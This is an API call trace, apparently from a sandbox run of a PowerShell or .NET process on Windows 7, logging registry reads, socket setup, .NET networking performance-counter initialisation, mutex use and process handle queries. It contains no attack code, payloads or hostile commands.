	[0236.238] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x5dee264 | out: lpFileInformation=0x5dee264*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0236.238] GetLastError () returned 0x2
	[0236.238] GetCurrentProcess () returned 0xffffffff
	[0236.238] GetLastError () returned 0x3f0
	[0236.238] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5dee4b8 | out: TokenHandle=0x5dee4b8*=0x394) returned 1
	[0236.238] GetLastError () returned 0x3f0
	[0236.239] GetCurrentProcess () returned 0xffffffff
	[0236.239] GetLastError () returned 0x3f0
	[0236.239] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5dee4b8 | out: TokenHandle=0x5dee4b8*=0x398) returned 1
	[0236.239] GetLastError () returned 0x3f0
	[0236.355] GetCurrentProcess () returned 0xffffffff
	[0236.355] GetLastError () returned 0x3f0
	[0236.355] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5dee294 | out: TokenHandle=0x5dee294*=0x3d0) returned 1
	[0236.355] GetLastError () returned 0x3f0
	[0236.463] GetCurrentProcess () returned 0xffffffff
	[0236.463] GetLastError () returned 0x3f0
	[0236.464] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5dee2a4 | out: TokenHandle=0x5dee2a4*=0x3d4) returned 1
	[0236.464] GetLastError () returned 0x3f0
	[0236.479] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x769e70 | out: lpWSAData=0x769e70) returned 0
	[0236.514] GetLastError () returned 0x0
	[0236.521] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20019, phkResult=0x5dede44 | out: phkResult=0x5dede44*=0x3e0) returned 0x0
	[0236.521] RegQueryValueExW (in: hKey=0x3e0, lpValueName="InstallationType", lpReserved=0x0, lpType=0x5dede8c, lpData=0x0, lpcbData=0x5dede88*=0x0 | out: lpType=0x5dede8c*=0x1, lpData=0x0, lpcbData=0x5dede88*=0xe) returned 0x0
	[0236.521] RegQueryValueExW (in: hKey=0x3e0, lpValueName="InstallationType", lpReserved=0x0, lpType=0x5dede8c, lpData=0x769e70, lpcbData=0x5dede88*=0xe | out: lpType=0x5dede8c*=0x1, lpData="Client", lpcbData=0x5dede88*=0xe) returned 0x0
	[0236.522] RegCloseKey (hKey=0x3e0) returned 0x0
	[0236.527] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x3e4
	[0236.534] GetLastError () returned 0x0
	[0236.534] setsockopt (s=0x3e4, level=65535, optname=128, optval="\x01", optlen=4) returned -1
	[0236.534] GetLastError () returned 0x273a
	[0236.534] closesocket (s=0x3e4) returned 0
	[0236.534] GetLastError () returned 0x0
	[0236.534] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x3e4
	[0236.536] GetLastError () returned 0x0
	[0236.536] setsockopt (s=0x3e4, level=65535, optname=128, optval="\x01", optlen=4) returned -1
	[0236.536] GetLastError () returned 0x273a
	[0236.536] closesocket (s=0x3e4) returned 0
	[0236.536] GetLastError () returned 0x0
	[0236.541] GetCurrentProcess () returned 0xffffffff
	[0236.541] GetLastError () returned 0x3f0
	[0236.541] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5dee260 | out: TokenHandle=0x5dee260*=0x3e4) returned 1
	[0236.541] GetLastError () returned 0x3f0
	[0236.555] GetCurrentProcess () returned 0xffffffff
	[0236.555] GetLastError () returned 0x3f0
	[0236.555] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5dee270 | out: TokenHandle=0x5dee270*=0x3e8) returned 1
	[0236.555] GetLastError () returned 0x3f0
	[0236.581] GetCurrentProcessId () returned 0x904
	[0236.583] GetComputerNameW (in: lpBuffer=0x7da200, nSize=0x2c96b80 | out: lpBuffer="XDUWTFONO", nSize=0x2c96b80) returned 1
	[0236.584] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\.NET CLR Networking\\Performance", ulOptions=0x0, samDesired=0x20019, phkResult=0x5dee4c4 | out: phkResult=0x5dee4c4*=0x3ec) returned 0x0
	[0236.585] RegQueryValueExW (in: hKey=0x3ec, lpValueName="Library", lpReserved=0x0, lpType=0x5dee50c, lpData=0x0, lpcbData=0x5dee508*=0x0 | out: lpType=0x5dee50c*=0x1, lpData=0x0, lpcbData=0x5dee508*=0x1c) returned 0x0
	[0236.585] RegQueryValueExW (in: hKey=0x3ec, lpValueName="Library", lpReserved=0x0, lpType=0x5dee50c, lpData=0x769e70, lpcbData=0x5dee508*=0x1c | out: lpType=0x5dee50c*=0x1, lpData="netfxperf.dll", lpcbData=0x5dee508*=0x1c) returned 0x0
	[0236.585] RegQueryValueExW (in: hKey=0x3ec, lpValueName="IsMultiInstance", lpReserved=0x0, lpType=0x5dee50c, lpData=0x0, lpcbData=0x5dee508*=0x0 | out: lpType=0x5dee50c*=0x4, lpData=0x0, lpcbData=0x5dee508*=0x4) returned 0x0
	[0236.587] RegQueryValueExW (in: hKey=0x3ec, lpValueName="IsMultiInstance", lpReserved=0x0, lpType=0x5dee50c, lpData=0x5dee4f8, lpcbData=0x5dee508*=0x4 | out: lpType=0x5dee50c*=0x4, lpData=0x5dee4f8*=0x1, lpcbData=0x5dee508*=0x4) returned 0x0
	[0236.587] RegQueryValueExW (in: hKey=0x3ec, lpValueName="First Counter", lpReserved=0x0, lpType=0x5dee50c, lpData=0x0, lpcbData=0x5dee508*=0x0 | out: lpType=0x5dee50c*=0x4, lpData=0x0, lpcbData=0x5dee508*=0x4) returned 0x0
	[0236.587] RegQueryValueExW (in: hKey=0x3ec, lpValueName="First Counter", lpReserved=0x0, lpType=0x5dee50c, lpData=0x5dee4f8, lpcbData=0x5dee508*=0x4 | out: lpType=0x5dee50c*=0x4, lpData=0x5dee4f8*=0x137a, lpcbData=0x5dee508*=0x4) returned 0x0
	[0236.587] RegCloseKey (hKey=0x3ec) returned 0x0
	[0236.589] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\.net clr networking\\Performance", ulOptions=0x0, samDesired=0x20019, phkResult=0x5dee4c0 | out: phkResult=0x5dee4c0*=0x3ec) returned 0x0
	[0236.589] RegQueryValueExW (in: hKey=0x3ec, lpValueName="CategoryOptions", lpReserved=0x0, lpType=0x5dee508, lpData=0x0, lpcbData=0x5dee504*=0x0 | out: lpType=0x5dee508*=0x4, lpData=0x0, lpcbData=0x5dee504*=0x4) returned 0x0
	[0236.589] RegQueryValueExW (in: hKey=0x3ec, lpValueName="CategoryOptions", lpReserved=0x0, lpType=0x5dee508, lpData=0x5dee4f4, lpcbData=0x5dee504*=0x4 | out: lpType=0x5dee508*=0x4, lpData=0x5dee4f4*=0x3, lpcbData=0x5dee504*=0x4) returned 0x0
	[0236.589] RegQueryValueExW (in: hKey=0x3ec, lpValueName="FileMappingSize", lpReserved=0x0, lpType=0x5dee508, lpData=0x0, lpcbData=0x5dee504*=0x0 | out: lpType=0x5dee508*=0x4, lpData=0x0, lpcbData=0x5dee504*=0x4) returned 0x0
	[0236.589] RegQueryValueExW (in: hKey=0x3ec, lpValueName="FileMappingSize", lpReserved=0x0, lpType=0x5dee508, lpData=0x5dee4f4, lpcbData=0x5dee504*=0x4 | out: lpType=0x5dee508*=0x4, lpData=0x5dee4f4*=0x20000, lpcbData=0x5dee504*=0x4) returned 0x0
	[0236.589] RegQueryValueExW (in: hKey=0x3ec, lpValueName="Counter Names", lpReserved=0x0, lpType=0x5dee508, lpData=0x0, lpcbData=0x5dee504*=0x0 | out: lpType=0x5dee508*=0x3, lpData=0x0, lpcbData=0x5dee504*=0xaa) returned 0x0
	[0236.589] RegQueryValueExW (in: hKey=0x3ec, lpValueName="Counter Names", lpReserved=0x0, lpType=0x5dee508, lpData=0x2c992c4, lpcbData=0x5dee504*=0xaa | out: lpType=0x5dee508*=0x3, lpData=0x2c992c4*, lpcbData=0x5dee504*=0xaa) returned 0x0
	[0236.605] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1
	[0236.607] GetLastError () returned 0x0
	[0236.610] CreateFileMappingW (hFile=0xffffffff, lpFileMappingAttributes=0x769ea0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x20000, lpName="Global\\netfxcustomperfcounters.1.0.net clr networking") returned 0x0
	[0236.610] GetLastError () returned 0x5
	[0236.612] OpenFileMappingW (dwDesiredAccess=0x2, bInheritHandle=0, lpName="Global\\netfxcustomperfcounters.1.0.net clr networking") returned 0x3f8
	[0236.612] GetLastError () returned 0x5
	[0236.615] MapViewOfFile (hFileMappingObject=0x3f8, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x4f90000
	[0236.617] VirtualQuery (in: lpAddress=0x4f90000, lpBuffer=0x5dee4d8, dwLength=0x1c | out: lpBuffer=0x5dee4d8*(BaseAddress=0x4f90000, AllocationBase=0x4f90000, AllocationProtect=0x4, RegionSize=0x20000, State=0x1000, Protect=0x4, Type=0x40000)) returned 0x1c
	[0236.617] GetLastError () returned 0x5
	[0236.617] LocalFree (hMem=0x7d2ec8) returned 0x0
	[0236.617] RegCloseKey (hKey=0x3ec) returned 0x0
	[0236.620] GetVersionExW (in: lpVersionInformation=0x769e88*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x769e88*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0236.620] GetLastError () returned 0x5
	[0236.620] GetVersionExW (in: lpVersionInformation=0x769e88*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x769e88*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0236.620] GetLastError () returned 0x5
	[0236.622] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2c99d40, cbSid=0x5dee4b8 | out: pSid=0x2c99d40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x5dee4b8) returned 1
	[0236.622] GetLastError () returned 0x5
	[0236.625] CreateMutexW (lpMutexAttributes=0x2c99e78, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x3ec
	[0236.625] GetLastError () returned 0x0
	[0236.635] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1f4) returned 0x0
	[0236.635] GetLastError () returned 0x0
	[0236.636] GetCurrentProcessId () returned 0x904
	[0236.716] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x904) returned 0x3fc
	[0236.716] GetLastError () returned 0x0
	[0236.719] GetProcessTimes (in: hProcess=0x3fc, lpCreationTime=0x5dee420, lpExitTime=0x5dee418, lpKernelTime=0x5dee418, lpUserTime=0x5dee418 | out: lpCreationTime=0x5dee420, lpExitTime=0x5dee418, lpKernelTime=0x5dee418, lpUserTime=0x5dee418) returned 1
	[0236.719] GetLastError () returned 0x0
	[0236.727] CloseHandle (hObject=0x3fc) returned 1
	[0236.727] GetLastError () returned 0x0
	[0236.727] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6dc) returned 0x3fc
	[0236.728] GetLastError () returned 0x0
	[0236.728] GetProcessTimes (in: hProcess=0x3fc, lpCreationTime=0x5dee470, lpExitTime=0x5dee468, lpKernelTime=0x5dee468, lpUserTime=0x5dee468 | out: lpCreationTime=0x5dee470, lpExitTime=0x5dee468, lpKernelTime=0x5dee468, lpUserTime=0x5dee468) returned 1
	[0236.728] GetLastError () returned 0x0
	[0236.729] CloseHandle (hObject=0x3fc) returned 1
	[0236.729] GetLastError () returned 0x0
	[0236.729] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0x6dc) returned 0x3fc
	[0236.729] GetLastError () returned 0x0
	[0236.729] GetCurrentProcess () returned 0xffffffff
	[0236.729] GetLastError () returned 0x0
	[0236.729] GetCurrentProcess () returned 0xffffffff
	[0236.730] GetLastError () returned 0x0
	[0236.754] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x3fc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5dee3d0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5dee3d0*=0x404) returned 1
	[0236.754] GetLastError () returned 0x0
	[0236.759] CloseHandle (hObject=0x404) returned 1
	[0236.759] GetLastError () returned 0x0
	[0236.760] CloseHandle (hObject=0x3fc) returned 1
	[0236.760] GetLastError () returned 0x0
	[0236.760] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x728) returned 0x3fc
	[0236.760] GetLastError () returned 0x0
	[0236.760] GetProcessTimes (in: hProcess=0x3fc, lpCreationTime=0x5dee470, lpExitTime=0x5dee468, lpKernelTime=0x5dee468, lpUserTime=0x5dee468 | out: lpCreationTime=0x5dee470, lpExitTime=0x5dee468, lpKernelTime=0x5dee468, lpUserTime=0x5dee468) returned 1
	[0236.760] GetLastError () returned 0x0
	[0236.761] CloseHandle (hObject=0x3fc) returned 1
	[0236.761] GetLastError () returned 0x0
	[0236.761] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0x728) returned 0x3fc
	[0236.761] GetLastError () returned 0x0
	[0236.761] GetCurrentProcess () returned 0xffffffff
	[0236.761] GetLastError () returned 0x0
	[0236.761] GetCurrentProcess () returned 0xffffffff
	[0236.761] GetLastError () returned 0x0
	[0236.761] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x3fc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5dee3d0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5dee3d0*=0x404) returned 1
	[0236.761] GetLastError () returned 0x0
	[0236.762] CloseHandle (hObject=0x404) returned 1
	[0236.762] GetLastError () returned 0x0
	[0236.762] CloseHandle (hObject=0x3fc) returned 1
	[0236.762] GetLastError () returned 0x0
	[0236.762] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x864) returned 0x3fc
	[0236.762] GetLastError () returned 0x0
	[0236.762] GetProcessTimes (in: hProcess=0x3fc, lpCreationTime=0x5dee470, lpExitTime=0x5dee468, lpKernelTime=0x5dee468, lpUserTime=0x5dee468 | out: lpCreationTime=0x5dee470, lpExitTime=0x5dee468, lpKernelTime=0x5dee468, lpUserTime=0x5dee468) returned 1
	[0236.762] GetLastError () returned 0x0
	[0236.762] CloseHandle (hObject=0x3fc) returned 1
	[0236.762] GetLastError () returned 0x0
	[0236.762] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0x864) returned 0x3fc
	[0236.763] GetLastError () returned 0x0
	[0236.763] GetCurrentProcess () returned 0xffffffff
	[0236.763] GetLastError () returned 0x0
	[0236.763] GetCurrentProcess () returned 0xffffffff
	[0236.763] GetLastError () returned 0x0
	[0236.763] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x3fc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5dee3d0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5dee3d0*=0x404) returned 1
	[0236.763] GetLastError () returned 0x0
	[0236.763] CloseHandle (hObject=0x404) returned 1
	[0236.763] GetLastError () returned 0x0
	[0236.763] CloseHandle (hObject=0x3fc) returned 1
	[0236.763] GetLastError () returned 0x0
	[0236.764] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb30) returned 0x3fc
	[0236.764] GetLastError () returned 0x0
	[0236.764] GetProcessTimes (in: hProcess=0x3fc, lpCreationTime=0x5dee470, lpExitTime=0x5dee468, lpKernelTime=0x5dee468, lpUserTime=0x5dee468 | out: lpCreationTime=0x5dee470, lpExitTime=0x5dee468, lpKernelTime=0x5dee468, lpUserTime=0x5dee468) returned 1
	[0236.764] GetLastError () returned 0x0
	[0236.764] CloseHandle (hObject=0x3fc) returned 1
	[0236.764] GetLastError () returned 0x0
	[0236.764] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0xb30) returned 0x3fc
	[0236.764] GetLastError () returned 0x0
	[0236.764] GetCurrentProcess () returned 0xffffffff
	[0236.764] GetLastError () returned 0x0
	[0236.764] GetCurrentProcess () returned 0xffffffff
	[0236.764] GetLastError () returned 0x0
	[0236.764] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x3fc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5dee3d0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5dee3d0*=0x404) returned 1
	[0236.764] GetLastError () returned 0x0
	[0236.765] CloseHandle (hObject=0x404) returned 1
	[0236.765] GetLastError () returned 0x0
	[0236.765] CloseHandle (hObject=0x3fc) returned 1
	[0236.765] GetLastError () returned 0x0
	[0236.765] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x888) returned 0x3fc
	[0236.765] GetLastError () returned 0x0
	[0236.765] GetProcessTimes (in: hProcess=0x3fc, lpCreationTime=0x5dee470, lpExitTime=0x5dee468, lpKernelTime=0x5dee468, lpUserTime=0x5dee468 | out: lpCreationTime=0x5dee470, lpExitTime=0x5dee468, lpKernelTime=0x5dee468, lpUserTime=0x5dee468) returned 1
	[0236.765] GetLastError () returned 0x0
	[0236.765] CloseHandle (hObject=0x3fc) returned 1
	[0236.766] GetLastError () returned 0x0
	[0236.766] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0x888) returned 0x3fc
	[0236.766] GetLastError () returned 0x0
	[0236.766] GetCurrentProcess () returned 0xffffffff
	[0236.766] GetLastError () returned 0x0
	[0236.766] GetCurrentProcess () returned 0xffffffff
	[0236.766] GetLastError () returned 0x0
	[0236.766] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x3fc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5dee3d0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5dee3d0*=0x404) returned 1
	[0236.766] GetLastError () returned 0x0
	[0236.766] CloseHandle (hObject=0x404) returned 1
	[0236.766] GetLastError () returned 0x0
	[0236.767] CloseHandle (hObject=0x3fc) returned 1
	[0236.767] GetLastError () returned 0x0
	[0236.767] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x708) returned 0x3fc
	[0236.767] GetLastError () returned 0x0
	[0236.767] GetProcessTimes (in: hProcess=0x3fc, lpCreationTime=0x5dee470, lpExitTime=0x5dee468, lpKernelTime=0x5dee468, lpUserTime=0x5dee468 | out: lpCreationTime=0x5dee470, lpExitTime=0x5dee468, lpKernelTime=0x5dee468, lpUserTime=0x5dee468) returned 1
	[0236.767] GetLastError () returned 0x0
	[0236.767] CloseHandle (hObject=0x3fc) returned 1
	[0236.767] GetLastError () returned 0x0
	[0236.767] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0x708) returned 0x3fc
	[0236.767] GetLastError () returned 0x0
	[0236.767] GetCurrentProcess () returned 0xffffffff
	[0236.767] GetLastError () returned 0x0
	[0236.767] GetCurrentProcess () returned 0xffffffff
	[0236.767] GetLastError () returned 0x0
	[0236.767] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x3fc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5dee3d0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5dee3d0*=0x404) returned 1
	[0236.767] GetLastError () returned 0x0
	[0236.768] CloseHandle (hObject=0x404) returned 1
	[0236.841] GetLastError () returned 0x0
	[0236.841] CloseHandle (hObject=0x3fc) returned 1
	[0236.841] GetLastError () returned 0x0
	[0236.841] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x120) returned 0x3fc
	[0236.841] GetLastError () returned 0x0
	[0236.841] GetProcessTimes (in: hProcess=0x3fc, lpCreationTime=0x5dee470, lpExitTime=0x5dee468, lpKernelTime=0x5dee468, lpUserTime=0x5dee468 | out: lpCreationTime=0x5dee470, lpExitTime=0x5dee468, lpKernelTime=0x5dee468, lpUserTime=0x5dee468) returned 1
	[0236.842] GetLastError () returned 0x0
	[0236.842] CloseHandle (hObject=0x3fc) returned 1
	[0236.842] GetLastError () returned 0x0
	[0236.842] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0x120) returned 0x3fc
	[0236.842] GetLastError () returned 0x0
	[0236.842] GetCurrentProcess () returned 0xffffffff
	[0236.842] GetLastError () returned 0x0
	[0236.842] GetCurrentProcess () returned 0xffffffff
	[0236.842] GetLastError () returned 0x0
	[0236.842] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x3fc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5dee3d0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5dee3d0*=0x404) returned 1
	[0236.842] GetLastError () returned 0x0
	[0236.843] CloseHandle (hObject=0x404) returned 1
	[0236.843] GetLastError () returned 0x0
	[0236.843] CloseHandle (hObject=0x3fc) returned 1
	[0236.843] GetLastError () returned 0x0
	[0236.843] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xaa0) returned 0x3fc
	[0236.843] GetLastError () returned 0x0
	[0236.843] GetProcessTimes (in: hProcess=0x3fc, lpCreationTime=0x5dee470, lpExitTime=0x5dee468, lpKernelTime=0x5dee468, lpUserTime=0x5dee468 | out: lpCreationTime=0x5dee470, lpExitTime=0x5dee468, lpKernelTime=0x5dee468, lpUserTime=0x5dee468) returned 1
	[0236.843] GetLastError () returned 0x0
	[0236.843] CloseHandle (hObject=0x3fc) returned 1
	[0236.843] GetLastError () returned 0x0
	[0236.843] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0xaa0) returned 0x3fc
	[0236.844] GetLastError () returned 0x0
	[0236.844] GetCurrentProcess () returned 0xffffffff
	[0236.844] GetLastError () returned 0x0
	[0236.844] GetCurrentProcess () returned 0xffffffff
	[0236.844] GetLastError () returned 0x0
	[0236.844] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x3fc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5dee3d0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5dee3d0*=0x404) returned 1
	[0236.844] GetLastError () returned 0x0
	[0236.844] CloseHandle (hObject=0x404) returned 1
	[0236.844] GetLastError () returned 0x0
	[0236.844] CloseHandle (hObject=0x3fc) returned 1
	[0236.845] GetLastError () returned 0x0
	[0236.845] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x808) returned 0x3fc
	[0236.845] GetLastError () returned 0x0
	[0236.845] GetProcessTimes (in: hProcess=0x3fc, lpCreationTime=0x5dee470, lpExitTime=0x5dee468, lpKernelTime=0x5dee468, lpUserTime=0x5dee468 | out: lpCreationTime=0x5dee470, lpExitTime=0x5dee468, lpKernelTime=0x5dee468, lpUserTime=0x5dee468) returned 1
	[0236.845] GetLastError () returned 0x0
	[0236.845] CloseHandle (hObject=0x3fc) returned 1
	[0236.845] GetLastError () returned 0x0
	[0236.845] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0x808) returned 0x3fc
	[0236.845] GetLastError () returned 0x0
	[0236.845] GetCurrentProcess () returned 0xffffffff
	[0236.845] GetLastError () returned 0x0
	[0236.845] GetCurrentProcess () returned 0xffffffff
	[0236.845] GetLastError () returned 0x0
	[0236.845] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x3fc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5dee3d0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5dee3d0*=0x404) returned 1
	[0236.846] GetLastError () returned 0x0
	[0236.846] CloseHandle (hObject=0x404) returned 1
	[0236.846] GetLastError () returned 0x0
	[0236.846] CloseHandle (hObject=0x3fc) returned 1
	[0236.846] GetLastError () returned 0x0
	[0236.846] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8c4) returned 0x3fc
	[0236.846] GetLastError () returned 0x0
	[0236.846] GetProcessTimes (in: hProcess=0x3fc, lpCreationTime=0x5dee470, lpExitTime=0x5dee468, lpKernelTime=0x5dee468, lpUserTime=0x5dee468 | out: lpCreationTime=0x5dee470, lpExitTime=0x5dee468, lpKernelTime=0x5dee468, lpUserTime=0x5dee468) returned 1
	[0236.847] GetLastError () returned 0x0
	[0236.847] CloseHandle (hObject=0x3fc) returned 1
	[0236.847] GetLastError () returned 0x0
	[0236.847] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0x8c4) returned 0x3fc
	[0236.847] GetLastError () returned 0x0
	[0236.847] GetCurrentProcess () returned 0xffffffff
	[0236.847] GetLastError () returned 0x0
	[0236.847] GetCurrentProcess () returned 0xffffffff
	[0236.847] GetLastError () returned 0x0
	[0236.847] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x3fc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5dee3d0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5dee3d0*=0x404) returned 1
	[0236.847] GetLastError () returned 0x0
	[0236.848] CloseHandle (hObject=0x404) returned 1
	[0236.848] GetLastError () returned 0x0
	[0236.848] CloseHandle (hObject=0x3fc) returned 1
	[0236.848] GetLastError () returned 0x0
	[0236.848] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7cc) returned 0x3fc
	[0236.848] GetLastError () returned 0x0
	[0236.848] GetProcessTimes (in: hProcess=0x3fc, lpCreationTime=0x5dee470, lpExitTime=0x5dee468, lpKernelTime=0x5dee468, lpUserTime=0x5dee468 | out: lpCreationTime=0x5dee470, lpExitTime=0x5dee468, lpKernelTime=0x5dee468, lpUserTime=0x5dee468) returned 1
	[0236.848] GetLastError () returned 0x0
	[0236.849] CloseHandle (hObject=0x3fc) returned 1
	[0236.849] GetLastError () returned 0x0
	[0236.849] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0x7cc) returned 0x3fc
	[0236.849] GetLastError () returned 0x0
	[0236.849] GetCurrentProcess () returned 0xffffffff
	[0236.849] GetLastError () returned 0x0
	[0236.849] GetCurrentProcess () returned 0xffffffff
	[0236.849] GetLastError () returned 0x0
	[0236.849] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x3fc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5dee3d0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5dee3d0*=0x404) returned 1
	[0236.849] GetLastError () returned 0x0
	[0236.850] CloseHandle (hObject=0x404) returned 1
	[0236.850] GetLastError () returned 0x0
	[0236.850] CloseHandle (hObject=0x3fc) returned 1
	[0236.850] GetLastError () returned 0x0
	[0236.850] ReleaseMutex (hMutex=0x3ec) returned 1
	[0236.851] GetLastError () returned 0x0
	[0236.851] CloseHandle (hObject=0x3ec) returned 1
	[0236.851] GetLastError () returned 0x0
	[0236.851] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2c9aa88, cbSid=0x5dee4b8 | out: pSid=0x2c9aa88*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x5dee4b8) returned 1
	[0236.851] GetLastError () returned 0x0
	[0236.852] CreateMutexW (lpMutexAttributes=0x2c9ab98, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x3ec
	[0236.852] GetLastError () returned 0x0
	[0236.852] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1f4) returned 0x0
	[0236.852] GetLastError () returned 0x0
	[0236.852] ReleaseMutex (hMutex=0x3ec) returned 1
	[0236.852] GetLastError () returned 0x0
	[0236.852] CloseHandle (hObject=0x3ec) returned 1
